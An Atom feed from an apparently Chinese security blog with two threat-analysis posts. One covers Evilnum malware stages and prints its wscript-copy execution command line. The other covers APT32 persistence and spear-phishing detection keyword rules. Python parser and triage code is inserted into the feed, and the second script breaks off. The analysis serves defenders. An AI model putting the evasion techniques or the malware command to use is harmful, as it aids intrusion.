<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
<title>Mr.Guo</title>
<icon>https://www.gravatar.com/avatar/46378062b1742d8202e853f79672c7c4</icon>
<subtitle>Infosec Beginner</subtitle>
<link href="/atom.xml" rel="self"/>
<link href="https://github.com/gha01un/gha01un.github.io/"/>
<updated>2022-10-16T08:35:01.088Z</updated>
<id>https://github.com/gha01un/gha01un.github.io/</id>
<author>
<name>Mr.Guo</name>
<email>[email protected]</email>
</author>
<generator uri="https://hexo.io/">Hexo</generator>
<entry>
<title>Summary of Recent Evilnum APT Group Attack Activity</title>
<link href="https://github.com/gha01un/gha01un.github.io/2022/10/14/Evilnum%20%E7%BB%84%E7%BB%87%E8%BF%91%E6%9C%9F%E6%94%BB%E5%87%BB%E8%A1%8C%E4%B8%BA%E7%9A%84%E6%80%BB%E7%BB%93/"/>
<id>https://github.com/gha01un/gha01un.github.io/2022/10/14/Evilnum%20%E7%BB%84%E7%BB%87%E8%BF%91%E6%9C%9F%E6%94%BB%E5%87%BB%E8%A1%8C%E4%B8%BA%E7%9A%84%E6%80%BB%E7%BB%93/</id>
<published>2022-10-14T07:09:39.778Z</published>
<updated>2022-10-16T08:35:01.088Z</updated>
<content type="html"><![CDATA[<p>Ugh, so hard to find! KPI...!!</p><a id="more"></a>
<h3 id="组织介绍"><a href="#组织介绍" class="headerlink" title="组织介绍"></a>Group Overview</h3>
<p>The Evilnum group is known for its use of the Evilnum malware and was first disclosed by a security vendor in 2018. The group specialises in spear-phishing emails against its targets, mainly fintech companies across Europe. Because most financial companies require identity documents to verify registration, the attachments used in the phishing emails typically use scans of credit cards, utility bills, ID cards, driver's licences and other identity images as lure content. Evilnum focuses on espionage and tries to obtain financial information from the target organisation, including customer lists, documents and presentations on investments and trades, trading-software credentials, browser data, email login information, customer credit-card data and even VPN configurations. Since early 2022 the activity of the Evilnum APT group has been closely monitored by several countries, and several instances of small, targeted campaigns against the UK and European countries have been identified. The recent activity uses updated tactics, techniques and procedures. In the earlier campaigns observed in 2021 the group's main delivery vector was Windows shortcut files (LNK) or malicious documents in ZIP archives sent to victims as email attachments. In the most recent cases the attackers have started to use MS Office Word documents and template injection to deliver the malicious payload to the victim's machine.</p>
<h3 id="攻击手法"><a href="#攻击手法" class="headerlink" title="攻击手法"></a>Attack Techniques</h3>
<ul><li>The Evilnum APT group's main targets are in the fintech (financial services) sector, especially companies handling trading and compliance in the UK and Europe.</li><li>In March 2022 there was a significant change in the group's targeting: it went after an intergovernmental organisation that handles international migration services.</li><li>The timeline of the attacks and the nature of the chosen target coincide with the Russia-Ukraine conflict.</li><li>The attackers used the "General Data Protection Regulation (GDPR)" as a lure for spear-phishing against KOT4X; identity-verification lures were also used.</li><li>The lure documents use an LNK that loads JS code to execute the malicious code. The LNK file contains JS code, a PDF, an EXE and other data; the final backdoor runs after several layers of JS decryption. The whole chain executes in multiple stages and is fairly complex.</li><li>The payloads have anti-debugging and AV-detection capabilities, and the payloads of several stages contain delay code: if fetching the final-stage payload fails, they wait 3 hours before running again, which shows that stealth is the backdoor's first principle.</li><li>The template-injection stage uses a macro-based document with VBA code techniques intended to bypass static analysis and hinder reverse engineering.</li><li>Heavily obfuscated JavaScript is used to decrypt and drop the payload on the endpoint. The JavaScript sets up a scheduled task to run the dropped binary. Compared with earlier versions used by the EvilNum APT group, this JavaScript shows a significant improvement in obfuscation.</li><li>All file names created during execution are carefully constructed by the attackers to impersonate legitimate Windows and other third-party binaries and evade detection tools.</li><li>In each new instance the group registers several domains containing keywords specific to the targeted industry vertical.</li></ul>
<img src="https://raw.githubusercontent.com/gha01un/PicGo/main/img/202210151756798.png" alt="image-20221011174914153" />
<h3 id="样本分析"><a href="#样本分析" class="headerlink" title="样本分析"></a>Sample Analysis</h3>
<h4 id="第-1-阶段:恶意文档"><a href="#第-1-阶段:恶意文档" class="headerlink" title="第 1 阶段:恶意文档"></a>Stage 1: Malicious Document</h4>
<figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://raw.githubusercontent.com/gha01un/PicGo/main/img/202210151801322.png" alt="" title=""> </div> <div class="image-caption"></div> </figure>
<p>The theme continues the file names Evilnum used for lure documents in earlier campaigns, meaning "proof of ownership". These sample documents are rather crudely made: this sample and a series of others exploit CVE-2017-0199 to execute the malicious behaviour, yet their visible content is an image prompting the victim to enable Office macros. Evilnum used this kind of prompt image in earlier campaigns, and it was reused unchanged in these samples.</p>
<img src="https://raw.githubusercontent.com/gha01un/PicGo/main/img/202210151756945.png" alt="image-20221009135954769" />
<h4 id="第-2-阶段:宏模板-VBA-代码清除技术"><a href="#第-2-阶段:宏模板-VBA-代码清除技术" class="headerlink" title="第 2 阶段:宏模板 [VBA 代码清除技术]"></a>Stage 2: Macro Template [VBA Stomping]</h4>
<p>The template contains the main malicious macro code. It uses the fairly uncommon VBA stomping technique, which destroys the source code and stores only the compiled form of the VBA macro (the p-code) in the document. This prevents static-analysis tools such as olevba from extracting decompiled VBA code.</p>
<p>Using the approach from the Walmart team's "VBA Stomping - Advanced Maldoc Techniques", we were able to extract the complete macro code.</p>
<p>All strings in the macro are decrypted with the string-decryption function shown in the figure.</p>
<img src="https://raw.githubusercontent.com/gha01un/PicGo/main/img/202210151756466.png" alt="image-20221014150715577" />
<p>The macro's main functions are as follows.</p>
<p><strong>1.</strong> The document contains two text boxes whose contents are encrypted. They are decrypted at run time by the VBA macro.</p>
<p>a) Text box 1 - <strong>msform_ct.TextBox1.Text</strong>. This is decrypted and its content written to <strong>%appdata%\ThirdPartyNotices.txt</strong></p>
<p>b) Text box 2 - <strong>msform_ct.TextBox2.Text</strong> - this is decrypted and its content written to <strong>%appdata%\Redist.txt</strong></p>
<p><strong>2.</strong> The legitimate Windows binary <strong>Wscript.exe</strong> is copied to a file named <strong>msdcat.exe</strong>. Malware performs this kind of file copy as a way of bypassing endpoint security products.</p>
<p><strong>3.</strong> The file Redist.txt contains obfuscated JavaScript, which is executed with the following command line:</p>
<p><strong><em>msdcat.exe /E:jscRipt "%appdata%\Redist.txt" dg ThirdPartyNotices.txt</em></strong></p>
<p><strong>Note:</strong> "dg" is a hard-coded command-line argument present in the VBA macro code.</p>
<p><strong>4.</strong> During execution the VBA macro calls doc.Shapes.AddPicture() several times to fetch JPG images from an attacker-controlled server. We believe this is done to track and log the execution of the code on the endpoint.</p>
<p>The figure shows one such example: between building the command line and executing it there is a call to doc.Shapes.AddPicture().</p>
<figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://raw.githubusercontent.com/gha01un/PicGo/main/img/202210151756024.png" alt="" title=""> </div> <div class="image-caption"></div> </figure>
<h4 id="第-3-阶段:去混淆和分析"><a href="#第-3-阶段:去混淆和分析" class="headerlink" title="第 3 阶段:去混淆和分析"></a>Stage 3: Deobfuscation and Analysis</h4>
<p>We highlight some unusual obfuscation techniques that are rarely seen in obfuscated JavaScript. At execution time two arguments are passed to this JavaScript via the following command line:</p>
<p>msdcat.exe /E:jscRipt "C:\Users\user\AppData\Roaming\Redist.txt" dg ThirdPartyNotices.txt</p>
<p><strong>Argument 1</strong>: "dg", a string later used by the string-decryption function in the JavaScript.</p>
<p><strong>Argument 2</strong>: the file "thirdpartynotifications.txt" contains encrypted code that the JavaScript decrypts and drops to the file system as SerenadeDACplApp.exe.</p>
<p>Most obfuscation techniques involve large numbers of encrypted and encoded strings that are referenced by index throughout the code. The usual deobfuscation approach requires many "find and replace" passes in which each reference is replaced by the actual decrypted and decoded string.</p>
<p>Here the JavaScript uses an interesting technique: the original string array is shuffled, and it is shuffled again in memory at execution time. Any attempt to decrypt the referenced strings without shuffling the array in the same way therefore produces errors. This hinders reverse engineering and also defeats some tools that try to automate deobfuscation.</p>
<p>The figure below shows the huge string array defined at the start of the JavaScript. The array is wrapped in a function as an extra layer of obfuscation.</p>
<figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://raw.githubusercontent.com/gha01un/PicGo/main/img/202210151756214.png" alt="" title=""> </div> <div class="image-caption"></div> </figure>
<p>The next step is to decode the obfuscated array. The figure shows the relevant JavaScript, which uses a rough approximation method to decode it. It has a predefined seed value "0x6467a". In each iteration the function computes a seed with the algorithm shown in the figure and compares it with the predefined seed "0x6467a"; if the condition is not met, the function keeps rotating the array contents right by one position until it is. Comments in the code explain the logic.</p>
<figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://raw.githubusercontent.com/gha01un/PicGo/main/img/202210151756173.png" alt="" title=""> </div> <div class="image-caption"></div> </figure>
<p>Other techniques used include control-flow flattening; the figure below shows a string-decryption function that uses it. A switch-case scrambles the order of the decryption steps, which follow this sequence:</p>
<p>"15|12|3|2|14|5|1|10|9|17|8|7|6|4|13|16|0|11"</p>
<p>This means "case 15" runs first, then "case 12", and so on; the final "case 11" returns the decrypted string.</p>
<figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://raw.githubusercontent.com/gha01un/PicGo/main/img/202210151756616.png" alt="" title=""> </div> <div class="image-caption"></div> </figure>
<h4 id="第-4-阶段:丢弃二进制文件(加载程序)"><a href="#第-4-阶段:丢弃二进制文件(加载程序)" class="headerlink" title="第 4 阶段:丢弃二进制文件(加载程序)"></a>Stage 4: Dropped Binary (Loader)</h4>
<p>As described in the previous section, the JavaScript drops two files:</p>
<p><strong>a)</strong> an executable (SerenadeDACplApp.exe)</p>
<p><strong>b)</strong> a binary file (devZUQVD.tmp)</p>
<p>The executable is run by the scheduled task together with the required arguments. During execution it does the following:</p>
<p><strong>1.</strong> Parses the command line to extract the binary to load</p>
<p>The loader checks whether the command line ends with ( <strong>"</strong> ). If so, the process terminates; otherwise the arguments are parsed to extract the binary to load.</p>
<p><strong># There are two code paths for extracting the file name</strong></p>
<ul><li>If the first argument has the format ( <strong>--[char]=[char]*</strong> ), the loader removes the first 5 characters from the argument string, <strong>prepends "dev"</strong> and <strong>appends ".tmp"</strong>. The resulting string is used as the file name of the dropped binary.</li></ul>
<p><strong>Example:</strong></p>
<p><strong>Argument string:</strong> --E=nThisIsUsedInFileName</p>
<p><strong>Extracted file name:</strong> devThisIsUsedInFileName.tmp</p>
<ul><li>Otherwise the second argument string is used as the file name of the dropped binary</li></ul>
<p><strong>2.</strong> Uses the Heaven's Gate technique to call the NtOpenFile API and obtain a file handle</p>
<p><strong>3.</strong> Uses the RtlAllocateHeap API to allocate memory for the file contents</p>
<p><strong>4.</strong> Uses Heaven's Gate to call the NtReadFile API and read the file contents into the allocated memory</p>
<p><strong>5.</strong> Decrypts the file contents</p>
<p><strong># Encrypted content format</strong></p>
<p>XOR key length (1 byte) + XOR key + encrypted content size (4 bytes) + encrypted content</p>
<figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://raw.githubusercontent.com/gha01un/PicGo/main/img/202210151756926.png" alt="" title=""> </div> <div class="image-caption"></div> </figure>
<p>The decrypted content turns out to be a PE file that uses a custom format to store the PE header and section header information.</p>
<p><strong># Decrypted content format</strong></p>
<p>Custom PE header + (custom section header + section data) * number of sections</p>
<p><strong># PE header format</strong></p>
<p>At the start of the decrypted content: PE marker (1 byte - 00) + ImageBase (4 bytes) + ImageSize (4 bytes) + EntryPoint (4 bytes) + number of sections (4 bytes) + offset from the start of the decrypted content to the first section info (4 bytes) + size of the decrypted content (4 bytes)</p>
<p><strong># Section header format</strong></p>
<p>Section marker (1 byte) + section RVA (4 bytes) + section VirtualSize (4 bytes) + unknown (4 bytes)</p>
<figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://raw.githubusercontent.com/gha01un/PicGo/main/img/202210151756554.png" alt="" title=""> </div> <div class="image-caption"></div> </figure>
<p><strong>7.</strong> Uses Heaven's Gate to call the NtAllocateVirtualMemory API to allocate memory for the PE file to be mapped.</p>
<p><strong>Note:</strong> the size is taken from the PE header format above.</p>
<p><strong>8.</strong> Maps the PE file in memory.</p>
<p><strong>9.</strong> Uses Heaven's Gate to call the NtCreateThreadEx API and create a thread at the entry point of the mapped PE.</p>
<p><strong>Note:</strong> the loader uses the Heaven's Gate technique to evade endpoint security products and syscall or API monitoring applications. The custom header format defeats memory scans for PE header or section header patterns, and it also makes it harder to dump the PE file and analyse it as a standalone executable.</p>
<h4 id="第-5-阶段:映射-PE(后门)"><a href="#第-5-阶段:映射-PE(后门)" class="headerlink" title="第 5 阶段:映射 PE(后门)"></a>Stage 5: Mapped PE (Backdoor)</h4>
<p><strong>1.</strong> The backdoor decrypts:</p>
<p>a) C2 domains</p>
<p>b) User-Agent strings</p>
<p>c) Network paths</p>
<p>d) Referrer strings</p>
<p>e) Cookies</p>
<p><strong>2.</strong> Resolves the API addresses of the libraries retrieved from the configuration</p>
<p><strong>3.</strong> Encrypts and Base64-encodes the generated string</p>
<img src="https://raw.githubusercontent.com/gha01un/PicGo/main/img/202210151756434.png" alt="image-20221014150911224" />
<p><strong>4.</strong> Picks one cookie from the configuration and embeds the encoded string in the Cookie header field.</p>
<h4 id="网络通讯"><a href="#网络通讯" class="headerlink" title="[+] 网络通讯"></a><strong>[+] Network Communication</strong></h4>
<p>After all of the above, the backdoor selects a C2 and a path from the configuration and sends a network request.</p>
<p>If the request succeeds, the backdoor queries the server for available content and downloads it.</p>
<p>Two different actions are taken depending on the content size:</p>
<p><strong>1.</strong> If the content size is 4, the backdoor checks whether the downloaded data equals <strong>"01"</strong>. If so, it takes a snapshot of the machine and sends it to the C2 server in a POST request. The snapshot data is exfiltrated in encrypted form, and the Cookie header carries additional information.</p>
<p><strong># Format of the cookie header string</strong></p>
<p>{</p>
<p>"u":"{first_arg-user_id}", "sc":1, "dt"="{snapshot_date_time}"</p>
<p>}</p>
<p><strong>2.</strong> If the content size is greater than 4, the backdoor decrypts the downloaded data and executes it.</p>
<h3 id="Indicators-of-compromise"><a href="#Indicators-of-compromise" class="headerlink" title="Indicators of compromise"></a><strong>Indicators of compromise</strong></h3>]]></content>
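A parser for the stage-4 loader layout described above, written here as an added example (it is not the write-up's or Evilnum's code). It assumes the 32-bit fields are little-endian and that a section's raw data length equals its VirtualSize, neither of which the write-up states; the SAMPLE input is constructed.

```python
"""Parser for the stage-4 loader blob (added example; not the write-up's code).
  outer : key_len(1) + xor_key + enc_size(4) + enc_data            (XOR-wrapped)
  inner : pe_hdr(25) then n_sections x [sec_hdr(13) + section data]
  pe_hdr: marker(1, 0x00) + image_base(4) + image_size(4) + entry_point(4)
          + n_sections(4) + first_section_offset(4) + total_size(4)
  sec_hdr: marker(1) + rva(4) + virtual_size(4) + unknown(4)
Assumptions: integers are 32-bit little-endian; raw section length == VirtualSize."""
import itertools
from dataclasses import dataclass, field


class FormatError(ValueError):
    """Raised when the blob does not match the documented layout."""


def u32(buf, off):
    """Read an unsigned 32-bit little-endian integer at offset off (endianness assumed)."""
    if off + 4 > len(buf):
        raise FormatError("truncated u32 at offset %d" % off)
    return int.from_bytes(buf[off:off + 4], "little")


def xor_unwrap(blob):
    """Strip the outer layer: key_len(1) + key + enc_size(4) + data, XOR with repeating key."""
    if len(blob) == 0:
        raise FormatError("empty blob")
    key_len = blob[0]
    if key_len == 0:
        raise FormatError("zero-length XOR key")
    key = blob[1:1 + key_len]
    if len(key) != key_len:
        raise FormatError("truncated XOR key")
    enc_size = u32(blob, 1 + key_len)
    enc = blob[5 + key_len:5 + key_len + enc_size]
    if len(enc) != enc_size:
        raise FormatError("declared size %d exceeds available data" % enc_size)
    return bytes(b ^ k for b, k in zip(enc, itertools.cycle(key)))


@dataclass
class Section:
    rva: int
    virtual_size: int
    unknown: int
    data: bytes = field(repr=False)


@dataclass
class CustomPE:
    image_base: int
    image_size: int
    entry_point: int
    sections: list


def parse_custom_pe(dec):
    """Walk the custom PE header and the per-section records of the decrypted content."""
    if len(dec) == 0 or dec[0] != 0x00:
        raise FormatError("bad PE marker byte")
    image_base, image_size, entry = u32(dec, 1), u32(dec, 5), u32(dec, 9)
    n_sections, first_off, total = u32(dec, 13), u32(dec, 17), u32(dec, 21)
    if total != len(dec):
        raise FormatError("header claims %d bytes, got %d" % (total, len(dec)))
    if entry >= image_size:
        raise FormatError("entry point lies outside the image")
    pos, sections = first_off, []
    for _ in range(n_sections):
        if pos + 13 > len(dec):
            raise FormatError("truncated section header")
        rva, vsize, unk = u32(dec, pos + 1), u32(dec, pos + 5), u32(dec, pos + 9)
        if rva + vsize > image_size:
            raise FormatError("section extends past ImageSize")
        data = dec[pos + 13:pos + 13 + vsize]  # raw length == VirtualSize (assumption)
        if len(data) != vsize:
            raise FormatError("truncated section data")
        sections.append(Section(rva, vsize, unk, data))
        pos += 13 + vsize
    return CustomPE(image_base, image_size, entry, sections)


def analyse(blob):
    """Full pipeline: XOR-unwrap, then parse the custom PE layout."""
    return parse_custom_pe(xor_unwrap(blob))


def build_sample(key, image_base, entry, sections):
    """Pack constructed sections into the layout and XOR-wrap them (test input only)."""
    le = lambda v: v.to_bytes(4, "little")
    body = b"".join(bytes([0x01]) + le(rva) + le(len(d)) + le(unk) + d
                    for rva, unk, d in sections)
    image_size = max(rva + len(d) for rva, _, d in sections)
    hdr = (bytes([0x00]) + le(image_base) + le(image_size) + le(entry)
           + le(len(sections)) + le(25) + le(25 + len(body)))
    enc = bytes(b ^ k for b, k in zip(hdr + body, itertools.cycle(key)))
    return bytes([len(key)]) + key + le(len(enc)) + enc


# Constructed sample: two sections (a NOP sled plus RET, and a string), key "k3y".
SAMPLE = build_sample(b"k3y", 0x400000, 0x1000,
                      [(0x1000, 0, b"\x90" * 8 + b"\xc3"), (0x2000, 0, b"hello")])
```

Every size and offset in the header is checked against the actual buffer before use, so a truncated or tampered blob raises FormatError instead of reading out of bounds.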
<summary type="html">
<p>Ugh, so hard to find! KPI...!!</p>
</summary>
<category term="Study" scheme="https://github.com/gha01un/gha01un.github.io/categories/Study/"/>
<category term="AI" scheme="https://github.com/gha01un/gha01un.github.io/tags/AI/"/>
</entry>
<entry>
<title>A Brief Analysis of APT</title>
<link href="https://github.com/gha01un/gha01un.github.io/2022/08/18/APT%E6%B5%85%E6%9E%90/"/>
<id>https://github.com/gha01un/gha01un.github.io/2022/08/18/APT%E6%B5%85%E6%9E%90/</id>
<published>2022-08-18T07:35:39.402Z</published>
<updated>2022-08-18T09:07:50.556Z</updated>
<content type="html"><![CDATA[<h2 id="APT浅析"><a href="#APT浅析" class="headerlink" title="APT浅析"></a>A Brief Analysis of APT</h2><a id="more"></a>
<h3 id="APT攻击定义及手法"><a href="#APT攻击定义及手法" class="headerlink" title="APT攻击定义及手法"></a>Definition and Techniques of APT Attacks</h3>
<p>APT: Advanced Persistent Threat. The commonly accepted definition is <strong>an organised, long-term and sustained network attack against high-value targets that uses a variety of advanced attack techniques</strong>. In other words, it is hard to decide whether a given attack is an APT attack; one can only analyse the characteristics of APT incidents that have already happened, relate them to the explanatory concept above and derive the general patterns of APT attacks.</p>
<p>Common APT techniques include spear phishing, watering-hole attacks, drive-by downloads, social engineering, instant-messaging tools and social networks; the ones that appear most often in the major analysis reports are <strong>spear phishing, watering-hole attacks and social engineering</strong>.</p>
<p>Spear phishing is a form of phishing, originating in Asia and Eastern Europe, that targets only specific victims. Once the attacker has locked onto a target, they send files that are hard to tell from genuine ones by <strong>email</strong> in the name of the company or organisation, luring employees into logging in with their account and password so that the attacker can install a Trojan or other spyware and steal secrets; or they plant a virus auto-downloader on web pages that employees browse frequently and keep updating the variants on the infected systems, so that users are kept busy fending them off.</p>
<p>A watering-hole attack is a <strong>computer intrusion technique</strong> whose targets are usually a specific group (an organisation, industry, region, etc.). The attacker first guesses or observes which websites the group visits frequently, compromises one or more of them and plants malware, eventually infecting some members of the target group.</p>
<figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://s2.loli.net/2022/08/18/rCT5suNkQbODoHm.jpg" alt="" title=""> </div> <div class="image-caption"></div> </figure>
<h3 id="平台上APT事件的理解"><a href="#平台上APT事件的理解" class="headerlink" title="平台上APT事件的理解"></a>Understanding APT Events on the Platform</h3>
<p>From this year's records several common types of APT event can be identified:</p>
<p>1. An internal IP address of some company resolves phishing domains of APT groups such as "毒云藤" (Poison Cloud Vine)</p>
<p>2. An internal IP address of some company shows a large volume of communications, mainly to IPs associated with APT groups such as 海莲花 (OceanLotus)</p>
<p>3. An IP address of some company actively connects to an APT group's C2 address</p>
<figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://s2.loli.net/2022/08/17/YDRtLIPAMNXqogz.png" alt="" title=""> </div> <div class="image-caption"></div> </figure>
<p>Collect the malicious domains and malicious IPs (IOCs) of currently known APT groups such as 海莲花 and 毒云藤 and build our own set, so that we can better catch APT-related information on the platform.</p>
<h3 id="对于鱼叉式钓鱼防范的思考"><a href="#对于鱼叉式钓鱼防范的思考" class="headerlink" title="对于鱼叉式钓鱼防范的思考"></a>Thoughts on Defending Against Spear Phishing</h3>
<p>Similar to packet rules, we can also write rules for spear phishing; by capturing mail-protocol traffic we can obtain some preliminary results.</p>
<p>When the attachment is an exe and the APT group is 毒云藤, match as follows:</p>
<p>Date: any characters</p>
<p>From: any characters@qq.com, or any characters@163.com, or any characters@foxmail.com, or any characters@Outlook.com, or Gmail.com</p>
<p>To: any characters</p>
<p>Subject: contains any of 更新, 下载, 安装, 简历, 登入, 密码, 账户异常, 系统管理员, 通知, 告警, 订单, 采购单, 发票, 会议日程, 参会名单, 历届会议回顾, 密码重置, 验证, 整改 (update, download, install, résumé, login, password, account anomaly, system administrator, notice, alert, order, purchase order, invoice, meeting agenda, attendee list, review of past meetings, password reset, verification, rectification)</p>
<p>Keywords:</p>
<blockquote><p>“201”,“202”,“2022年”,“报”,“报告”,“兵”,“部队”,“对台”,“工作”,“规划”,“国”,“国际”,“航”,“合作”,“机”,“机场”,“基地”,“极地”,“军”,“军事”,“科技”,“密”,“内部”,“十”,“十三”,“台”,“台湾”,“铁路”,“无人”,“项”,“雪”,“研”,“运输”,“战”,“站”,“中”</p></blockquote>
<p>Content-Type: application/octet-stream;</p>
<p>name="(any characters).exe"</p>
<h3 id="海莲花-APT32的简单分析"><a href="#海莲花-APT32的简单分析" class="headerlink" title="海莲花-APT32的简单分析"></a>A Brief Analysis of 海莲花 (APT32)</h3>
<p>"海莲花", also known as APT32 and OceanLotus, is a hacker group with a Vietnamese background. It has long conducted network attacks against <strong>China's energy-related industries, maritime agencies, maritime construction departments, research institutes and shipping companies</strong>.<br>APT32 has actively used the KerrDown downloader since at least 2018 to deliver backdoors such as Cobalt Strike Beacon in attacks on Chinese and Vietnamese-speaking users.<br>KerrDown is delivered mainly through DOC documents in MHT format, DOCX documents with template injection, and ZIP and RAR archives.<br>KerrDown contains multiple layers of shellcode and mostly performs DLL hijacking against EXEs carrying valid signatures from companies such as Microsoft, Google, Adobe and Neuber.</p>
<h4 id="Microsoft-Word-白利用的攻击示例"><a href="#Microsoft-Word-白利用的攻击示例" class="headerlink" title="Microsoft Word 白利用的攻击示例"></a>Example of a Microsoft Word Signed-Binary Abuse (白利用) Attack</h4>
<p>(CPLH-NHNN-01-2019.rar): the lure document dropped by this sample and a translation of its content are shown below. It uses the State Bank of Vietnam as a lure and appears to be a targeted attack on branches associated with the State Bank of Vietnam.</p>
<figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://s2.loli.net/2022/08/17/5gvCEt9WZOBAn7Y.png" alt="" title=""> </div> <div class="image-caption"></div> </figure>
<figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://s2.loli.net/2022/08/17/ItC7hda6Ge2UBFj.png" alt="" title=""> </div> <div class="image-caption"></div> </figure>
<p><strong>Word signed-binary abuse</strong> is the most common technique, mainly because the Word executable carries the Word document icon and can be disguised as a document file for phishing, which makes it a favourite. To make the disguise as a Word document convincing, after the Trojan runs it drops and opens a Word document to fool the victim.</p>
<h4 id="以包含模板注入功能的-DOCX-文档为载体的攻击示例"><a href="#以包含模板注入功能的-DOCX-文档为载体的攻击示例" class="headerlink" title="以包含模板注入功能的 DOCX 文档为载体的攻击示例"></a>Example of an Attack Carried by a DOCX Document with Template Injection</h4>
<p>The sample CV-AnthonyWei-CustomerService.docx mainly <strong>loads a remote Word template</strong>; the <strong>malicious macro code</strong> in the remote template extracts and drops <strong>two PE files</strong> from the DOCX and adds the main program to the scheduled tasks. When that service starts, it loads an embedded SCLoader from memory, which downloads shellcode from a remote server and executes it. The sample's main execution flow is as follows:</p>
<figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://s2.loli.net/2022/08/17/aP3fltu7Cmn56HE.png" alt="" title=""> </div> <div class="image-caption"></div> </figure>
<p>The sample's analysis results in the ThreatBook cloud sandbox (微步云沙箱) are shown below:</p>
<figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://s2.loli.net/2022/08/17/NQfgi5nWITvsrKY.png" alt="" title=""> </div> <div class="image-caption"></div> </figure>
<figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://s2.loli.net/2022/08/17/bTP4epoO85R7gDs.png" alt="" title=""> </div> <div class="image-caption"></div> </figure>
<p>The service module's main function is to load in memory an embedded EXE named PostData.exe</p>
<figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://s2.loli.net/2022/08/17/fVaXKpjeMZW6JiA.png" alt="" title=""> </div> <div class="image-caption"></div> </figure>
<p>PostData.exe takes specific command-line arguments to download and execute the payload</p>
<figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://s2.loli.net/2022/08/17/NpDnZ4IPLcK9jrs.png" alt="" title=""> </div> <div class="image-caption"></div> </figure>
<p>APT32 has a rich, custom arsenal; KerrDown, which it has actively used since at least 2018, is a downloader used to deliver backdoors such as Cobalt Strike Beacon. The KerrDown attack profile is as follows:</p>
<table><thead><tr><th align="left">Delivery vector</th><th align="left">DOC(MHT), DOCX(TemplateInject), ZIP, RAR</th></tr></thead><tbody><tr><td align="left">Technical features</td><td align="left">Multi-layer shellcode; "white plus black" abuse (signed binary plus malicious DLL) of Microsoft, Google, Adobe, Neuber, 360 and others</td></tr><tr><td align="left">Delivered payload</td><td align="left">Cobalt Strike Beacon</td></tr><tr><td align="left">Targets</td><td align="left">China, Vietnamese-speaking users</td></tr></tbody></table>
<h4 id="海莲花白利用持久化新型组合攻击方式"><a href="#海莲花白利用持久化新型组合攻击方式" class="headerlink" title="海莲花白利用持久化新型组合攻击方式"></a>海莲花's New Combined Signed-Binary Persistence Technique</h4>
<p>While hunting 海莲花 activity, we found that after breaking into an enterprise the group abuses <strong>signed-binary (白利用) techniques for persistent residence</strong>. After lateral movement, it uses a <strong>new signed-binary</strong> residence pattern to persist.</p>
<p>The attack steps are as follows:</p>
<p>① Compromise the enterprise's internal management console.</p>
<p>② Use the compromised console to establish remote service connections to the target internal endpoints over SMB/RPC.</p>
<p>③ Collect information about the applications and services on the internal endpoints, together with other information useful for customisation, e.g. internal IP ranges, MAC addresses and host names.</p>
<p>④ Deliver the <strong>customised backdoor module</strong> to a specified directory on the target endpoint.</p>
<p>⑤ Deliver the signed ("white") file and replace the original executable of the endpoint's service with it.</p>
<figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://s2.loli.net/2022/08/18/TujgPoBEJeSFb5d.png" alt="" title=""> </div> <div class="image-caption"></div> </figure>
<p>When the endpoint's existing scheduled task starts the service, it effectively launches the signed-binary-plus-backdoor combination. Observation and analysis of the attack process show that 海莲花 chooses mainly <strong>non-system services</strong>, e.g. the Google update service GoogleUpdate.exe and the Adobe update service armsvc.exe. Replacing these services <strong>does not affect normal use of the applications</strong>. Because no new service entry is created and the original service configuration is not modified, only the service executable is replaced, and the replacement "white" file is itself a trusted file, the whole thing resembles an application update and thereby evades the checks of security software.</p>
<h4 id="新旧白利用方式横向对比"><a href="#新旧白利用方式横向对比" class="headerlink" title="新旧白利用方式横向对比"></a>Comparison of the Old and New Signed-Binary Methods</h4>
<p>Previously, when 海莲花 used signed-binary techniques, it mostly <strong>launched the signed-binary combination via a remote service or remote scheduled task</strong>. When an internal endpoint is connected remotely, traces are left behind, and there is no way to <strong>persistently control the launch of the signed-binary combination</strong>. The new method uses the scheduled task of a legitimate program (service) that already exists on the victim's system to start the signed file and load the backdoor module at fixed times, achieving persistent residence while avoiding the traces that a remote service connection would leave.</p>
<figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://s2.loli.net/2022/08/18/3o8jFVrBYwpH5gN.png" alt="" title=""> </div> <div class="image-caption"></div> </figure>]]></content>
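The spear-phishing mail rule sketched in the post, turned into runnable triage logic as an added example (not the blog's own tooling). It assumes a raw RFC 822 message as input and applies the page's keyword list to the subject and the attachment name, since the page does not say which field the keywords cover; only a subset of that list is included and the sample message is constructed.

```python
"""Spear-phishing triage rule from the post above (added example, not the blog's code).
Assumptions: raw RFC 822 input; the page's keyword list is applied to the subject and
the attachment file name (the page leaves the field unspecified); subset of keywords."""
import email
import email.utils
import re

SENDER_DOMAINS = {"qq.com", "163.com", "foxmail.com", "outlook.com", "gmail.com"}
SUBJECT_TERMS = ["更新", "下载", "安装", "简历", "登入", "密码", "账户异常", "系统管理员",
                 "通知", "告警", "订单", "采购单", "发票", "会议日程", "参会名单",
                 "历届会议回顾", "密码重置", "验证", "整改"]
KEYWORDS = ["报告", "部队", "对台", "规划", "国际", "机场", "基地", "军事", "科技",
            "内部", "台湾", "铁路", "无人", "运输"]   # subset of the page's list


def sender_domain(msg):
    """Domain part of the From: address, lower-cased; empty string if absent."""
    addr = email.utils.parseaddr(str(msg.get("From", "")))[1]
    return addr.rpartition("@")[2].lower()


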